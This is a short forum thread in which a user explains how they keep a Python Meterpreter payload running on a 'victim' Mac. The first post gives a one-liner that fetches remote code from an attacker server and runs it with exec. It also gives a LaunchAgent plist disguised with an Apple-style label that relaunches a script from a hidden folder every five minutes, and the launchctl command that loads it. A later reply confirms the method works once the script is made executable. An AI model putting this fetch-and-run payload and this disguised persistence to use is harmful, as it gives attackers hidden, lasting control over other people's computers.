Python Meterpreter Persistence in Mac OS

hayaxinth · March 26, 2018, 7:51pm

I’m using a web delivery method to deliver a python meterpreter payload on victim Mac Os machine. My problem is that I want to use the python script that downloads the payload to persist. The python code I use is

import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://aa.aa.aa.aaa:888/6nSh1Td3SGsR8');exec(r.read());

I want to be able to use this code in a python script and call it using a .plist and a launch agent. My .plist looks like:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>Label</key>
        <string>com.apple.inMemTask14</string>
        <key>ProgramArguments</key>
        <array>
            <string>/usr/bin/python</string>
            <string>/Users/open/Library/Containers/.heheosx/MacOSHighSierra.py</string>
        </array>
        <key>StartInterval</key>
    	<integer>300</integer>	
    </dict>
    </plist>

With the python code to download meterpreter in MacOSHighSierra.py. I used launchctl load -w /Users/open/Library/LaunchAgents/com.apple.inMemTask14.plist to launch the agent. I believe the python file is not executing since I don’t get a connection on msfconsole. What’s wrong with my method?

hayaxinth · March 27, 2018, 2:42pm

I made a stupid mistake of not making my Python script executable. Anyways, I think this is a good post for people looking into persistence in Mac OS.

system · March 30, 2018, 2:42pm

This topic was automatically closed 3 days after the last reply. New replies are no longer allowed.